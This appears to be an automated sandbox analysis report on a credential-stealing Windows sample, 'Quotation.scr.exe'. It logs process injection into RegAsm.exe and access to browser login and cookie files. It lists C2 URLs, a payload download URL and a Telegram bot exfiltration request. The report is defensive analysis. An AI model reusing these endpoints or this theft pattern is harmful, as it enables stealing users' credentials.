                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 444000Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 446000Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A37008Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeQueries volume information: C:\Users\user\Desktop\Quotation.scr.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTR
                    Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2245862196.0000000002903000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTR
                    Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    311
                    Process Injection
                    1
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    11
                    Security Software Discovery
                    Remote Services1
                    Email Collection
                    1
                    Web Service
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading
                    1
                    Scheduled Task/Job
                    31
                    Virtualization/Sandbox Evasion
                    LSASS Memory1
                    Process Discovery
                    Remote Desktop Protocol11
                    Archive Collected Data
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    311
                    Process Injection
                    Security Account Manager31
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin Shares1
                    Data from Local System
                    3
                    Ingress Tool Transfer
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Deobfuscate/Decode Files or Information
                    NTDS1
                    Application Window Discovery
                    Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                    Obfuscated Files or Information
                    LSA Secrets1
                    System Network Configuration Discovery
                    SSHKeylogging14
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Software Packing
                    Cached Domain Credentials13
                    System Information Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Quotation.scr.exe29%VirustotalBrowse
                    Quotation.scr.exe32%ReversingLabsWin32.Dropper.Generic
                    Quotation.scr.exe100%AviraHEUR/AGEN.1308518
                    Quotation.scr.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    eg-mart.com0%VirustotalBrowse
                    reallyfreegeoip.org0%VirustotalBrowse
                    api.telegram.org2%VirustotalBrowse
                    checkip.dyndns.com0%VirustotalBrowse
                    checkip.dyndns.org0%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    http://varders.kozow.com:80810%URL Reputationsafe
                    http://aborters.duckdns.org:8081100%URL Reputationmalware
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
                    http://anotherarmy.dns.army:8081100%URL Reputationmalware
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                    https://eg-mart.com0%Avira URL Cloudsafe
                    https://stackoverflow.com/q/14436606/233540%Avira URL Cloudsafe
                    https://www.office.com/0%Avira URL Cloudsafe
                    https://api.telegram.org0%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-netJ0%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                    https://api.telegram.org/bot0%Avira URL Cloudsafe
                    https://www.office.com/0%VirustotalBrowse
                    https://eg-mart.com1%VirustotalBrowse
                    https://api.telegram.org1%VirustotalBrowse
                    https://github.com/mgravell/protobuf-netJ0%VirustotalBrowse
                    https://www.office.com/lB0%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-net0%Avira URL Cloudsafe
                    http://checkip.dyndns.org0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                    https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
                    https://api.telegram.org/bot2%VirustotalBrowse
                    https://www.office.com/lB0%VirustotalBrowse
                    http://checkip.dyndns.org0%VirustotalBrowse
                    https://github.com/mgravell/protobuf-net0%VirustotalBrowse
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20a0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=0%VirustotalBrowse
                    http://checkip.dyndns.org/0%Avira URL Cloudsafe
                    https://chrome.google.com/webstore?hl=en0%VirustotalBrowse
                    https://github.com/mgravell/protobuf-neti0%Avira URL Cloudsafe
                    https://stackoverflow.com/q/14436606/233540%VirustotalBrowse
                    https://stackoverflow.com/q/11564914/23354;0%Avira URL Cloudsafe
                    http://checkip.dyndns.org/0%VirustotalBrowse
                    https://stackoverflow.com/q/2152978/233540%Avira URL Cloudsafe
                    http://checkip.dyndns.org/q0%Avira URL Cloudsafe
                    https://stackoverflow.com/q/11564914/23354;0%VirustotalBrowse
                    https://chrome.google.com/webstore?hl=enlB0%Avira URL Cloudsafe
                    https://eg-mart.com/Mytiypg.vdf0%Avira URL Cloudsafe
                    https://reallyfreegeoip.org0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20and%20Time:%2010/09/2024%20/%2003:15:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20618321%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-neti0%VirustotalBrowse
                    https://reallyfreegeoip.org/xml/0%Avira URL Cloudsafe
                    https://stackoverflow.com/q/2152978/233540%VirustotalBrowse
                    https://eg-mart.com/Mytiypg.vdf0%VirustotalBrowse
                    https://reallyfreegeoip.org0%VirustotalBrowse
                    https://reallyfreegeoip.org/xml/0%VirustotalBrowse
                    http://checkip.dyndns.org/q0%VirustotalBrowse
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    eg-mart.com
                    135.181.160.46
                    truefalseunknown
                    reallyfreegeoip.org
                    188.114.96.3
                    truetrueunknown
                    api.telegram.org
                    149.154.167.220
                    truetrueunknown
                    checkip.dyndns.com
                    132.226.8.169
                    truefalseunknown
                    checkip.dyndns.org
                    unknown
                    unknowntrueunknown
                    NameMaliciousAntivirus DetectionReputation
                    https://reallyfreegeoip.org/xml/8.46.123.33false
                    • URL Reputation: safe
                    unknown
                    http://checkip.dyndns.org/false
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://eg-mart.com/Mytiypg.vdffalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20and%20Time:%2010/09/2024%20/%2003:15:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20618321%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.office.com/RegAsm.exe, 00000002.00000002.4574409470.0000000002ED5000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://duckduckgo.com/chrome_newtabRegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://eg-mart.comQuotation.scr.exe, 00000000.00000002.2245862196.00000000023E1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://duckduckgo.com/ac/?q=RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://stackoverflow.com/q/14436606/23354Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://api.telegram.orgRegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://github.com/mgravell/protobuf-netJQuotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://api.telegram.org/botQuotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 2%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.office.com/lBRegAsm.exe, 00000002.00000002.4574409470.0000000002ED0000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://github.com/mgravell/protobuf-netQuotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://checkip.dyndns.orgRegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://chrome.google.com/webstore?hl=enRegAsm.exe, 00000002.00000002.4574409470.0000000002EA4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.ecosia.org/newtab/RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://varders.kozow.com:8081Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20aRegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://aborters.duckdns.org:8081Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    unknown
                    https://ac.ecosia.org/autocomplete?q=RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://github.com/mgravell/protobuf-netiQuotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://reallyfreegeoip.org/xml/8.46.123.33$RegAsm.exe, 00000002.00000002.4574409470.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://anotherarmy.dns.army:8081Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    unknown
                    https://stackoverflow.com/q/11564914/23354;Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://stackoverflow.com/q/2152978/23354Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://checkip.dyndns.org/qQuotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://chrome.google.com/webstore?hl=enlBRegAsm.exe, 00000002.00000002.4574409470.0000000002E9F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://reallyfreegeoip.orgRegAsm.exe, 00000002.00000002.4574409470.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D5F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQuotation.scr.exe, 00000000.00000002.2245862196.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedQuotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
